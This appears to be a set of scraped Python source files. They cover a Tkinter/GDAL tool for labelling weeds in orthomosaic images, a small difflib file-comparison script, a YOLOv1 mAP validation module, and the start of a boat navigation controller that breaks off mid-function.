self.btn_shape_reference.destroy()\n self.label3.destroy()\n self.spinbox_backg.destroy()\n self.btn_start.destroy()\n self.btn_load_mosaico.destroy()\n self.spinbox3.destroy()\n self.spinbox2.destroy()\n self.label4.destroy()\n self.label5.destroy()\n\n\n else:\n \n self.canvas1.destroy()\n self.label1.destroy()\n\n self.opt.destroy()\n self.labelTest.destroy()\n\n def get_text(self): \n text_val = self.entry_text.get()\n \n label_init = tk.Label(root, text=text_val)\n self.canvas_init.create_window(200, 230, window=label_init)\n\n def get_current_value(self):\n self.slider_pencil = self.current_value.get()\n if self.slider_pencil < 10:\n self.slider_pencil = 10\n return '{: .2f}'.format(self.current_value.get())\n\n def slider_changed(self, event):\n self.value_label.configure(text=self.get_current_value())\n\n def get_values_spinbox(self, type=''):\n\n if type == 'Compare Results':\n\n if self.first_click_bool == False:\n self.iterator_recoil = float(int(self.spinbox1.get())/100)\n self.iterator_x = int(self.spinbox2.get())\n self.iterator_y = int(self.spinbox3.get())\n\n elif type == 'Draw Weeds':\n self.background_percent = float(1-int(self.spinbox_backg.get())/100)\n self.iterator_x = int(self.spinbox2.get())\n self.iterator_y = int(self.spinbox3.get())\n self.iterator_recoil = 1.0\n print(self.background_percent)\n \n else:\n values1 = self.iterator_recoil * 100\n values2 = self.iterator_x\n values3 = self.iterator_y\n\n def get_values_radio(self):\n self.first_click_bool = not (self.first_click_bool)\n \n if self.first_click_bool:\n bool_default = bool(self.bool_value.get())\n self.spn_box_1.set('80')\n self.spn_box_2.set('500')\n self.spn_box_3.set('400')\n #self.bool_value.set(bool_default)\n\n else:\n bool_default = False\n self.bool_value.set(bool_default)\n \n def get_btn(self, event, key):\n self.event_btn = key\n if key=='0':\n self.name_tif = self.load_shp(0)[0]\n\n elif key=='1':\n self.name_reference_binary = self.load_shp(1)[1]\n \n elif key=='2':\n self.name_reference_neural = self.load_shp(2)[2]\n\n elif key=='3':\n self.name_reference_binary = self.load_shp(1)[1]\n\n elif key=='6':\n self.option_draw = True\n\n elif key=='7':\n self.option_draw = False\n\n elif self.name_tif != '' and self.name_reference_binary != '' and self.name_reference_neural != '' and key=='5':\n root.geometry(\"800x600+400+100\")\n self.ready_start = False\n\n if self.name_tif != '' and self.name_reference_binary != '' and key=='5':\n #self.remove_buttons('Draw Menu')\n self.reference_binary = self.shp_to_bin( self.name_reference_binary, self.name_tif)\n self.daninha_1 = gdal.Open(self.reference_binary)\n self.daninha_band_1 = self.daninha_1.GetRasterBand(1)\n self.remove_buttons('Fisrt Menu')\n self.labelling_start()\n self.remove_buttons('Draw Menu')\n\n self.dst_img = gdal.GetDriverByName('GTiff').Create('resutado_gerado.tif', self.mosaico.RasterXSize, self.mosaico.RasterYSize, 1, gdal.GDT_Byte, options=['COMPRESS=DEFLATE'])\n self.dst_img.SetProjection(self.mosaico.GetProjectionRef())\n self.dst_img.SetGeoTransform(self.mosaico.GetGeoTransform()) \n\n self.button_right.bind(\"\", partial(self.button_click, key=\"1\"))\n self.button_left.bind(\"\", partial(self.button_click, key=\"0\"))\n\n\n if self.ready_start:\n self.rm_btn()\n \n self.reference_binary = gdal.Open(self.shp_to_bin(self.name_reference_binary, self.name_tif), 1)\n self.reference_neural = gdal.Open(self.shp_to_bin(self.name_reference_neural, self.name_tif), 1)\n \n self.dst_img = gdal.GetDriverByName('GTiff').Create(self.name_reference_binary + '_out_2.tif', self.reference_binary.RasterXSize, self.reference_binary.RasterYSize, 1, gdal.GDT_Byte, options=['COMPRESS=DEFLATE'])\n self.dst_img.SetProjection(self.reference_binary.GetProjectionRef())\n self.dst_img.SetGeoTransform(self.reference_binary.GetGeoTransform()) \n\n button_left = tk.Button(root, text=\"Back\")\n button_left.place(relx=0.02, rely=0.4, height=48, width=100)\n button_left.bind(\"\", partial(self.button_click, key=\"0\"))\n\n button_right = tk.Button(root, text=\"Next\")\n button_right.place(relx=0.85, rely=0.4, height=48, width=100)\n button_right.bind(\"\", partial(self.button_click, key=\"1\"))\n\n def run(self):\n self.labelling_start()\n \n def create_buttons(self):\n #Botao para Selecionar uma Imagem\n root.maxsize(700, 700) \n\n self.btn_selet_image = tk.Button(root, text=\"Select an image\", command=self.select_image)\n self.btn_selet_image.place(x=50, y=10)\n\n #Botao para Segmentacao\n self.btn_segmentation = tk.Button(root, text=\"Apply Segmentation\", command=self.predict_image)\n self.btn_segmentation.place(x=400, y=10)\n\n #Botao para escolher a marcara de referencia\n self.btn_mask_true = tk.Button(root, text=\"Select Mask\", command=self.select_true_binary)\n self.btn_mask_true.place(x=50, y=326)\n\n #Botao para analisar as diferencas entre a predicao e a mascara\n self.btn_diff_imgs = tk.Button(root, text=\"Differences\", command=self.diff_imgs)\n self.btn_diff_imgs.place(x=400, y=326)\n\n #Paineis para Exibicao\n #Painel Superior Esquerdo\n self.painel_up_left = tk.Label(root)\n self.painel_up_left.place(x=20, y=50)\n\n #Painel Superior Direito\n self.painel_up_right = tk.Label(root)\n self.painel_up_right.place(x=320, y=50)\n\n #Painel Inferior Esquerdo \n self.painel_down_left = tk.Label(root)\n self.painel_down_left.place(x=20, y=366)\n\n #Painel Inferior Direito\n self.painel_down_right = tk.Label(root)\n self.painel_down_right.place(x=320, y=366)\n\n def select_image(self):\n\n self.path_rgb = filedialog.askopenfilename()\n if self.path_rgb:\n \n self.img_rgb = cv2.imread(self.path_rgb, -1)\n self.img_rgb = cv2.resize(self.img_rgb, (256,256))\n\n image = Image.fromarray(self.img_rgb)\n image_tk = ImageTk.PhotoImage(image)\n\n self.painel_up_left.configure(image=image_tk)\n self.painel_up_left.image = image_tk\n\n def callback_opt(self, *args):\n\n if (self.old_choose == 'Test Neural Network' and self.variable.get() != 'Test Neural Network'):\n self.remove_buttons()\n\n if(self.variable.get() == 'Test Neural Network'):\n self.labelTest.destroy()\n self.opt.destroy()\n self.create_buttons()\n\n elif(self.variable.get() == 'Generate Shape from RGB Tif'):\n\n root.maxsize(self.width_size, self.hight_size) \n if self.load_rgb_tif()[0]:\n self.generate_binary_tif()\n self.generate_shape()\n\n else:\n mbox.showerror('Error', 'Nenhum Ortomosaico.tif foi Selecionado :')\n tif_loaded = False\n \n elif(self.variable.get() == 'Generate Shape from Binary Tif'):\n root.maxsize(self.width_size, self.hight_size) \n if self.load_rgb_tif()[0]:\n self.generate_shape()\n else:\n mbox.showerror('Error', 'Nenhum Ortomosaico.tif foi Selecionado :')\n tif_loaded = False\n\n elif(self.variable.get() == 'Compare Results'):\n\n root.maxsize(self.width_size, self.hight_size)\n self.name_tif = self.load_rgb_tif()\n\n [unused, self.name_reference_binary, self.name_reference_neural] = self.load_shp(3)\n #self.reference_binary = self.shp_to_bin(name_reference_binary)\n\n self.reference_binary = gdal.Open(self.shp_to_bin(self.name_reference_binary, self.name_tif[1]))\n self.reference_neural = gdal.Open(self.shp_to_bin(self.name_reference_neural, self.name_tif[1]))\n\n if self.name_tif[0]:\n\n button_left = tk.Button(root, text=\"Back\")\n button_left.place(x=self.width_size*0.04, y=self.hight_size*0.5)\n button_left.bind(\"\", partial(self.button_click, key=\"0\"))\n\n button_right = tk.Button(root, text=\"Next\")\n button_right.place(x=self.width_size*0.70, y=self.hight_size*0.5)\n button_right.bind(\"\", partial(self.button_click, key=\"1\"))\n \n else:\n mbox.showerror('Error', 'Nenhum Ortomosaico.tif foi Selecionado :')\n tif_loaded = False\n \n elif(self.variable.get() == 'Draw Weeds'):\n\n if not os.path.isdir(self.path_save_img_rgb):\n os.makedirs(self.path_save_img_rgb, exist_ok=True)\n \n if not os.path.isdir(self.path_save_img_bin):\n os.makedirs(self.path_save_img_bin, exist_ok=True)\n\n self.labelling_menu()\n\n self.old_choose = self.variable.get()\n \n def button_click(self, event=None, key=None):\n if (self.bool_draw):\n cv2.imwrite(self.path_save_img_rgb + '/daninha_{x}_{y}.png'.format(x=int(self.x_crop),y=int(self.y_crop)), self.imgparcela)\n cv2.imwrite(self.path_save_img_bin + '/daninha_{x}_{y}.png'.format(x=int(self.x_crop),y=int(self.y_crop)), self.save_draw_array)\n self.dst_img.GetRasterBand(1).WriteArray(self.save_draw_array, xoff=self.x_crop, yoff=self.y_crop)\n self.dst_img.FlushCache()\n\n self.bool_draw = False\n self.draw_lines_array.clear()\n self.draw_img = PIL.Image.new(\"RGB\",(self.iterator_x, self.iterator_y),(0,0,0))\n self.draw_line = PIL.ImageDraw.Draw(self.draw_img)\n self.cnt_validator = []\n \n if (key == \"1\"):\n if (self.x_crop + self.iterator_x < self.mosaico.RasterXSize and self.x_crop + self.iterator_x > 0):\n self.x_crop += self.iterator_x * self.iterator_recoil\n print('key 1 - if 0')\n\n if self.x_crop + self.iterator_x > self.mosaico.RasterXSize:\n self.x_max = self.x_crop - self.iterator_x * self.iterator_recoil\n print('entrou')\n\n if (self.x_crop + self.iterator_x > self.mosaico.RasterXSize):\n self.x_crop = 0\n self.y_crop += self.iterator_y * self.iterator_recoil\n print('key 1 - if 1')\n\n\n if (self.y_crop + self.iterator_y > self.mosaico.RasterYSize):\n self.x_crop = self.x_crop\n self.y_crop = self.y_crop\n print('key 1 - if 2')\n mbox.showinfo(title='Todo o Mosaico foi Percorrido!')\n\n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n while cv2.countNonZero(self.daninha_parcela) <= self.iterator_x*self.iterator_y*0.05:\n if (self.x_crop + self.iterator_x < self.mosaico.RasterXSize and self.x_crop + self.iterator_x > 0):\n self.x_crop += self.iterator_x * self.iterator_recoil\n print('key 1 - if 0')\n\n if self.x_crop + self.iterator_x > self.mosaico.RasterXSize:\n self.x_max = self.x_crop - self.iterator_x * self.iterator_recoil\n print('entrou')\n\n if (self.x_crop + self.iterator_x > self.mosaico.RasterXSize):\n self.x_crop = 0\n self.y_crop += self.iterator_y * self.iterator_recoil\n print('key 1 - if 1')\n\n if (self.y_crop + self.iterator_y > self.mosaico.RasterYSize):\n self.x_crop = self.x_crop\n self.y_crop = self.y_crop\n print('key 1 - if 2')\n mbox.showinfo(title='Todo o Mosaico foi Percorrido!')\n break\n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n\n elif (key == \"0\"):\n if (self.x_crop - self.iterator_x < self.mosaico.RasterXSize):\n self.x_crop -= self.iterator_x * self.iterator_recoil\n print('key 0 - if 1')\n\n if self.x_crop <= 0: \n self.x_crop = self.x_max\n self.y_crop -= self.iterator_y * self.iterator_recoil\n print('key 0 - if 2')\n\n if (self.y_crop - self.iterator_y > self.mosaico.RasterYSize):\n self.x_crop =0\n self.y_crop -= self.iterator_y * self.iterator_recoil\n print('aqui2')\n \n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n while cv2.countNonZero(self.daninha_parcela) <= self.iterator_x*self.iterator_y*0.05:\n if (self.x_crop - self.iterator_x < self.mosaico.RasterXSize):\n self.x_crop -= self.iterator_x * self.iterator_recoil\n print('key 0 - if 1')\n\n if self.x_crop <= 0: \n self.x_crop = self.x_max\n self.y_crop -= self.iterator_y * self.iterator_recoil\n print('key 0 - if 2')\n\n if (self.y_crop - self.iterator_y > self.mosaico.RasterYSize):\n self.x_crop =0\n self.y_crop -= self.iterator_y * self.iterator_recoil\n print('aqui2')\n \n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n print('x :', self.x_crop,', y :', self.y_crop)\n self.daninha_parcela = self.daninha_band_1.ReadAsArray(self.x_crop, self.y_crop, self.iterator_x, self.iterator_y)\n #while (cv2.countNonZero(self.daninha_parcela) == 0): \n \n blueparcela = self.blue.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n greenparcela = self.green.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n redparcela = self.red.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n self.imgparcela = cv2.merge((blueparcela, greenparcela, redparcela))\n\n '''\n img_neural = self.reference_neural.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n self.img_binary = self.reference_binary.ReadAsArray(self.x_crop, self.y_crop,self.iterator_x, self.iterator_y)\n union, self.dif = nf.diff_contourns(self, img_neural, self.img_binary)\n \n self.contours = nf.find_contourns(self, self.dif)\n self.draw = cv2.drawContours(self.imgparcela, self.contours, -1, (255, 0, 0), 3)\n \n img = PIL.Image.fromarray(self.draw)'''\n\n img = PIL.Image.fromarray(self.imgparcela)\n self.image_tk = ImageTk.PhotoImage(img)\n self.array_clicks.clear()\n self.first_click = True\n self.canvas.grid(row=0, column=0, sticky=tk.N+tk.S+tk.E+tk.W)\n self.canvas.create_image(self.iterator_x // 2, self.iterator_y // 2, image=self.image_tk, anchor=tk.CENTER)\n self.canvas.config(scrollregion=self.canvas.bbox(tk.ALL))\n\n self.canvas.bind(\"\", self.get_x_and_y)\n self.canvas.bind(\"\", self.draw_smth)\n #cv2.countNonZero(self.save_draw_array)\n \n \n def get_x_and_y(self, event):\n global lasx, lasy\n lasx, lasy = event.x, event.y\n #self.array_clicks.append(lasx)\n #self.array_clicks.append(lasy)\n\n def draw_smth(self, event):\n global lasx, lasy\n if(self.option_draw):\n self.line_obj = self.canvas.create_line((lasx, lasy, event.x, event.y), \n fill='red', capstyle=tk.ROUND, \n joinstyle=tk.ROUND, width=int(self.slider_pencil),\n smooth=True, splinesteps=12,\n dash=(3,5))\n ''' \n self.canvas_draw = self.canvas.create_polygon((self.array, event.x, event.y), \n fill='red', capstyle=tk.ROUND, \n joinstyle=tk.ROUND, width=10,\n smooth=True, splinesteps=12,\n dash=(3,5))\n '''\n lasx, lasy = event.x, event.y\n self.draw_line.line((lasx, lasy, event.x, event.y), (255,255,255), width=int(self.slider_pencil), joint='curve')\n\n Offset = (int(self.slider_pencil)-1)/2\n self.draw_line.ellipse ((lasx-Offset,lasy-Offset,lasx+Offset,lasy+Offset), (255,255,255))\n \n x = [[self.line_obj, lasx, lasy]]\n \n self.draw_lines_array.extend(x)\n\n else:\n lasx, lasy = event.x, event.y\n for i in range(0, len(self.draw_lines_array[:][:]), 1):\n if lasx - self.slider_pencil <= self.draw_lines_array[:][i][1] and lasx + self.slider_pencil > self.draw_lines_array[:][i][1] and \\\n lasy - self.slider_pencil <= self.draw_lines_array[:][i][2] and lasy + self.slider_pencil > self.draw_lines_array[:][i][2]:\n print('x_cord :', lasx, 'y_cord :',lasy)\n print(self.draw_lines_array[:][i])\n self.canvas.delete(self.draw_lines_array[:][i][0])\n self.draw_line.line((lasx, lasy, event.x, event.y), (0,0,0), width=int(self.slider_pencil), joint='curve')\n Offset = (int(self.slider_pencil))/2\n self.draw_line.ellipse ((lasx-Offset,lasy-Offset,lasx+Offset,lasy+Offset), (0,0,0))\n self.bool_draw = True\n print(self.draw_lines_array) \n self.save_draw_array = np.asarray(self.draw_img)\n self.save_draw_array = nf.prepare_array(self, self.save_draw_array)\n #self.save_draw_array = nf.prepare_array(self, self.save_draw_array)\n #ia.imshow(self.save_draw_array[0][0]) \n \n def printcoords(self, event):\n\n cx, cy = self.event2canvas(event, self.canvas)\n self.ctn = []\n if self.first_click == True: \n\n for i in range(0, len(self.contours)):\n self.cnt_validator.append(False)\n self.img_fit = cv2.fillPoly(self.dif, pts=self.contours, color=(0,0,0))\n\n self.first_click = False\n\n for i in range(0, len(self.cnt_validator)): \n r = cv2.pointPolygonTest(self.contours[i], (cx, cy), False)\n if r > 0:\n self.cnt_validator[i] = (not self.cnt_validator[i]) \n self.ctn = self.contours[i]\n\n if self.cnt_validator[i] == True:\n self.draw = cv2.drawContours(self.imgparcela, self.ctn, -1, (0, 255, 0), 3)\n self.img_fit = cv2.fillPoly(self.dif, pts=[self.ctn], color=(255,255,255))\n\n union_ref_checker = self.diff_contourns(self.img_binary, self.img_fit)[0]\n self.dst_img.GetRasterBand(1).WriteArray(union_ref_checker, xoff=self.x_crop, yoff=self.y_crop)\n\n else:\n self.draw = cv2.drawContours(self.imgparcela, self.ctn, -1, (255, 0, 0), 3)\n self.img_fit = cv2.fillPoly(self.dif, pts=[self.ctn], color=(0,0,0))\n\n img = PIL.Image.fromarray(self.draw)\n image_tk = ImageTk.PhotoImage(img)\n #self.canvas.destroy()\n #self.canvas.pack(fill=tk.BOTH,expand=0)\n #self.painel_center.image=image_tk\n\n def save_in_reference_tif(self):\n\n if self.reference_neural.endswith('tif'):\n self.red = self.mosaico.GetRasterBand(1)\n\n self.dst_img = gdal.GetDriverByName('GTiff').Create(str(self.reference_neural), self.nx, self.ny, 1, gdal.GDT_Byte)\n self.dst_img.SetGeoTransform(self.mosaico.GetGeoTransform())\n self.srs = osr.SpatialReference()\n self.srs.ImportFromWkt(self.mosaico.GetProjection())\n self.dst_img.SetProjection(self.srs.ExportToWkt())\n\n def load_rgb_tif(self):\n\n path_rgb_shp = filedialog.askopenfilename(title='Selecione O Mosaico')\n if path_rgb_shp.endswith('tif'):\n\n self.mosaico = gdal.Open(path_rgb_shp)\n self.red = self.mosaico.GetRasterBand(1)\n self.green = self.mosaico.GetRasterBand(2)\n self.blue = self.mosaico.GetRasterBand(3)\n self.alpha = self.mosaico.GetRasterBand(4)\n\n self.nx = self.mosaico.RasterXSize \n self.ny = self.mosaico.RasterYSize\n\n file_path = pathlib.Path(path_rgb_shp)\n self.out_file = pathlib.Path('/')\n self.out_file = file_path.parent/(\"out\" + \".shp\")\n path_temp = file_path.parent/'temp_files'\n\n if path_temp.exists():\n shutil.rmtree(str(path_temp))\n os.mkdir(str(path_temp))\n else:\n os.mkdir(str(path_temp))\n \n self.dst_img = gdal.GetDriverByName('GTiff').Create(str(path_temp/'outfile.tif'), self.nx, self.ny, 1, gdal.GDT_Byte)\n self.dst_img.SetGeoTransform(self.mosaico.GetGeoTransform())\n self.srs = osr.SpatialReference()\n self.srs.ImportFromWkt(self.mosaico.GetProjection())\n self.dst_img.SetProjection(self.srs.ExportToWkt())\n tif_loaded = True\n \n else:\n mbox.showerror('Error', 'Selecione um Arquivo .tif')\n tif_loaded = False\n \n return tif_loaded, path_rgb_shp\n\n def load_shp(self, type_shape=0, option='Compare Results'):\n \"\"\"\n Carrega o shp que sera utilido nas comparacoes\n type : 0 - Carrega o Mosaico \n 1 - Representa o shape de referencia\n 2 - Representa o shape da rede neural\n 3 - Representa o shape de ambos\n option : Refere-se ao tipo de operacao a ser executada\n \"\"\"\n if option == 'Compare Results':\n if type_shape == 0:\n\n path_reference_tif = self.load_rgb_tif()[1]\n path_reference_shp = None\n path_neural_shp = None\n\n elif type_shape == 1:\n path_reference_tif = None\n path_reference_shp = filedialog.askopenfilename(title='Selecione o Shape de Referência :')\n path_neural_shp = None\n\n elif type_shape == 2:\n path_reference_tif = None\n path_reference_shp = None\n path_neural_shp = filedialog.askopenfilename(title='Selecione o Shape da Rede Neural :')\n\n elif type_shape == 3:\n path_reference_shp = filedialog.askopenfilename(title='Selecione o Shape de Referência :')\n path_reference_tif = None\n path_neural_shp = filedialog.askopenfilename(title='Selecione o Shape da Rede Neural :')\n\n return path_reference_tif, path_reference_shp, path_neural_shp\n\n def shp_to_bin(self, name_shp, name_tif, burn=255):\n\n base_img = gdal.Open(name_tif, gdal.GA_ReadOnly)\n base_shp = ogr.Open(name_shp)\n base_shp_layer = base_shp.GetLayer()\n\n #output_name = name_shp + '_out.tif\n output = gdal.GetDriverByName('GTiff').Create(name_shp + '_out.tif', base_img.RasterXSize, base_img.RasterYSize, 1, gdal.GDT_Byte, options=['COMPRESS=DEFLATE'])\n output.SetProjection(base_img.GetProjectionRef())\n output.SetGeoTransform(base_img.GetGeoTransform()) \n\n Band = output.GetRasterBand(1)\n raster = gdal.RasterizeLayer(output, [1], base_shp_layer, burn_values=[burn])\n\n Band = None\n output = None\n base_img = None\n base_shp = None\n\n return name_shp + '_out.tif'\n\n def generate_binary_tif(self): \n mbox.showinfo(\"Information\", \"Gerando Resultados: Isso pode demorar um pouco: \")\n iterator_x = 256\n iterator_y = 256\n\n for x in range(0, self.mosaico.RasterXSize, iterator_x):\n\n for y in range(0, self.mosaico.RasterYSize, iterator_y):\n \n if ((x+iterator_x)>self.mosaico.RasterXSize) or ((y+iterator_y)>self.mosaico.RasterYSize):\n continue\n \n blueparcela = self.blue.ReadAsArray(x,y,iterator_x,iterator_y)\n greenparcela = self.green.ReadAsArray(x,y,iterator_x,iterator_y)\n redparcela = self.red.ReadAsArray(x,y,iterator_x,iterator_y)\n self.imgparcela = cv2.merge((blueparcela,greenparcela,redparcela))\n img = self.imgparcela / 255\n\n pr = nf.predict_image(self, img)\n \n if (self.imgparcela.max()>0) and (self.imgparcela.min()<255):\n write_image = pr\n\n else:\n pr[pr>=255]= 0\n write_image = pr\n \n self.dst_img.GetRasterBand(1).WriteArray(write_image, xoff=x, yoff=y)\n self.dst_img.self.dst_img.FlushCache()\n\n def generate_shape(self):\n src_band = self.dst_img.GetRasterBand(1)\n dst_layername = 'daninhas'\n drv = ogr.GetDriverByName(\"ESRI Shapefile\")\n dst_ds = drv.CreateDataSource(str(self.out_file))\n dst_layer = dst_ds.CreateLayer(dst_layername, srs = self.srs)\n\n gdal.Polygonize(src_band, src_band, dst_layer, -1, [], callback=None )\n dst_ds.Destroy()\n mbox.showinfo(\"Information\", \"Shape Gerado com Sucesso!: \")\n\n def destroy_aplication(self):\n string_text = 'x_' + str(self.x_crop) + '_y_' + str(self.y_crop) + '_name_' + str(self.name_tif)\n with open(\"log_progress.txt\", \"ab\") as f:\n f.write(string_text.encode('utf-8', 'ignore'))\n root.destroy()\n\nif __name__ == \"__main__\":\n\n root = tk.Tk()\n obj = Interface(root)\n root.title('Semantic Segmetation Tools')\n root.resizable(False,False)\n obj.first_menu(root)\n #Interface(root).run()\n root.geometry(\"800x800+400+400\")\n Exit1 = tk.Button(root, text=\"Sair\", command=obj.destroy_aplication)\n Exit1.place(relx=0.019, rely=0.871, height=48, width=100)\n root.mainloop()","repo_name":"betoecd/Anne","sub_path":"interface_tk/main_interface.py","file_name":"main_interface.py","file_ext":"py","file_size_in_byte":45686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28925310882","text":"import difflib\nimport os\nimport argparse\n\n\ndef mkdir():\n current_folder = os.getcwd()\n if os.path.exists(current_folder + \"/result/\"):\n pass\n else:\n os.makedirs(current_folder + \"/result/\")\n\n\ndef _reader(path):\n with open(path, \"r\") as f:\n text = f.read().splitlines()\n return text\n\n\ndef compare_doc(doc1, doc2):\n current_folder = os.getcwd()\n text1 = _reader(doc1)\n text2 = _reader(doc2)\n diff = difflib.HtmlDiff()\n result = diff.make_file(text1, text2)\n with open(current_folder + \"/result/result{}.html\".format(args.d1),\n \"w\") as f:\n f.write(result)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-d1', type=str)\n parser.add_argument('-d2', type=str)\n args = parser.parse_args()\n mkdir()\n compare_doc(args.d1, args.d2)\n","repo_name":"XM-WANG/others","sub_path":"compare/wxm.py","file_name":"wxm.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10616861722","text":"import os\nimport json\nimport pprint\nimport platform\nimport argparse\nfrom pathlib import Path\nfrom datetime import datetime\n\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\n\nfrom dataset import Dataset\nfrom transform import BasicTransform, AugmentTransform\nfrom yolo import YoloModel\n\nfrom logger import build_basic_logger\n\nfrom utils import generate_random_color, transform_xcycwh_to_x1y1x2y2, filter_confidence, run_NMS, scale_coords, transform_x1y1x2y2_to_x1y1wh, imwrite, visualize_prediction, analyse_mAP_info\n\nSEED = 42\ntorch.manual_seed(SEED)\nTIMESTAMP = datetime.today().strftime(\"%Y-%m-%d_%H-%M\")\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#MEAN = 0.4333\n#STD = 0.2194\n\ndef to_tensor(image):\n image = np.ascontiguousarray(image.transpose(2, 0, 1))\n return torch.from_numpy(image).float()\n\n\ndef to_image(tensor, mean=(0.4333, 0.4333, 0.4333), std=(0.2194, 0.2194, 0.2194)):\n denorm_tensor = tensor.clone()\n for t, m, s in zip(denorm_tensor, mean, std):\n t.mul_(s).add_(m)\n denorm_tensor.clamp_(min=0, max=1.)\n denorm_tensor *= 255\n image = denorm_tensor.permute(1,2,0).numpy().astype(np.uint8)\n return image\n\n@torch.no_grad()\ndef validate(class_list, color_list, mAP_filepath, dataloader, model, evaluator, epoch=0, save_result=False, conf_thres = 0.001, nms_thres = 0.6, img_log_dir=\"/workspace/storage/object-detection/yolov1/experiments/training-image\"):\n \n model.eval()\n \n with open(mAP_filepath, mode='r') as f:\n json_file = json.load(f)\n \n cocoPred = []\n check_images, check_preds, check_results = [], [], []\n imageToid = json_file[\"imageToid\"]\n\n for _, minibatch in enumerate(dataloader):\n filenames, images, shapes = minibatch[0], minibatch[1], minibatch[3]\n predictions = model(images.to(device))\n\n for j in range(len(filenames)):\n prediction = predictions[j].cpu().numpy()\n prediction[:, 1:5] = transform_xcycwh_to_x1y1x2y2(boxes=prediction[:, 1:5], clip_max=1.0)\n prediction = filter_confidence(prediction=prediction, conf_threshold=conf_thres)\n prediction = run_NMS(prediction=prediction, iou_threshold=nms_thres)\n\n if len(check_images) < 5:\n check_images.append(to_image(images[j]))\n check_preds.append(prediction.copy())\n\n if len(prediction) > 0:\n filename = filenames[j]\n shape = shapes[j]\n cls_id = prediction[:, [0]]\n conf = prediction[:, [-1]]\n box_x1y1x2y2 = scale_coords(img1_shape=images.shape[2:], coords=prediction[:, 1:5], img0_shape=shape[:2])\n box_x1y1wh = transform_x1y1x2y2_to_x1y1wh(boxes=box_x1y1x2y2)\n img_id = np.array((imageToid[filename],) * len(cls_id))[:, np.newaxis]\n cocoPred.append(np.concatenate((img_id, box_x1y1wh, conf, cls_id), axis=1))\n\n del images, predictions\n\n if (epoch % 10 == 0) and img_log_dir:\n for k in range(len(check_images)):\n check_image = check_images[k]\n check_pred = check_preds[k]\n check_result = visualize_prediction(image=check_image, prediction=check_pred, class_list=class_list, color_list=color_list)\n check_results.append(check_result)\n concat_result = np.concatenate(check_results, axis=1)\n imwrite(str(img_log_dir +\"/\"+ f\"EP-{epoch:03d}.jpg\"), concat_result)\n\n if len(cocoPred) > 0:\n cocoPred = np.concatenate(cocoPred, axis=0)\n mAP_dict, eval_text = evaluator(predictions=cocoPred)\n\n if save_result:\n np.savetxt(\"/workspace/storage/object-detection/yolov1/experiments/predictions.txt\", cocoPred, fmt=\"%.4f\", delimiter=\",\", header=f\"Inference results of [image_id, x1y1wh, score, label] on {TIMESTAMP}\")\n return mAP_dict, eval_text\n else:\n return None, None\n\ndef result_analyis(class_list, mAP_dict, path=\"/workspace/storage/object-detection/yolov1/experiments\"):\n analysis_result = analyse_mAP_info(mAP_dict, class_list)\n data_df, figure_AP, figure_dets, fig_PR_curves = analysis_result\n data_df.to_csv(str(path + f\"/result-AP.csv\"))\n figure_AP.savefig(str(path + f\"/figure-AP.jpg\"))\n figure_dets.savefig(str(path + f\"/figure-dets.jpg\"))\n PR_curve_dir = path + \"/PR-curve\" \n os.makedirs(PR_curve_dir, exist_ok=True)\n for class_id in fig_PR_curves.keys():\n fig_PR_curves[class_id].savefig(str(PR_curve_dir + f\"/{class_list[class_id]}.jpg\"))\n fig_PR_curves[class_id].clf()\n","repo_name":"wilfredkisku/OBJECT-DETECTION-DNN","sub_path":"object-detection/yolov1/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20496158322","text":"import os\r\nimport cv2\r\nimport json\r\nimport time\r\nfrom turtle import position\r\nimport numpy as np\r\nimport threading\r\nfrom geographiclib.geodesic import Geodesic\r\n\r\n#\r\n# 0x1000 > 0x1100 : Speed\r\n# 0x0001 : Arm\r\n# 0x0010 : Disarm\r\n# 1x0000 : Return to Home (first waypoint)\r\n# 1x0001 : Start Autopilot\r\n# 1x0011 : Stop Autopilot\r\n# 2x-60 > 2x+60 : Rudder heading (direct)\r\n# 3x0000 : Stop everything\r\n#\r\n\r\nclass Nav:\r\n\r\n def __init__(self):\r\n\r\n self.GPS = []\r\n self.escs = []\r\n self.rudders = []\r\n self.position = {}\r\n self.waypoints = []\r\n self.retHome = False\r\n self.running = True\r\n self.autopilot_running = True\r\n self.depth = -1\r\n self.depthshot = None\r\n self.offset = 0\r\n self.sample_ticker = 0\r\n self.heading = -1\r\n self.sats = -1\r\n\r\n\r\n def report(self, message : str) -> None:\r\n\r\n print(f\"[NAV] {message}\")\r\n\r\n \r\n # def add_esc(self, esc : object | list) -> None: (python3.10)\r\n def add_esc(self, esc : object) -> None:\r\n\r\n if isinstance(esc, object):\r\n self.escs.append(esc)\r\n self.report(\"Added ESC\")\r\n\r\n elif isinstance(esc, list):\r\n for esc_ in esc:\r\n self.escs.append(esc_)\r\n self.report(f\"Added {len(esc)} ESCs\")\r\n\r\n #def add_rudder(self, rudder : object | list) -> None: (python3.10)\r\n def add_rudder(self, rudder : object) -> None:\r\n\r\n if isinstance(rudder, object):\r\n self.rudders.append(rudder)\r\n self.report(\"Added rudder\")\r\n\r\n elif isinstance(rudder, list):\r\n for rudder_ in rudder:\r\n self.rudders.append(rudder_)\r\n self.report(f\"Added {len(rudder)} rudders\")\r\n\r\n\r\n def handle_networking(self, recieved : list) -> bool:\r\n\r\n for msg in recieved:\r\n\r\n if msg[0:3] == \"0x1\":\r\n for 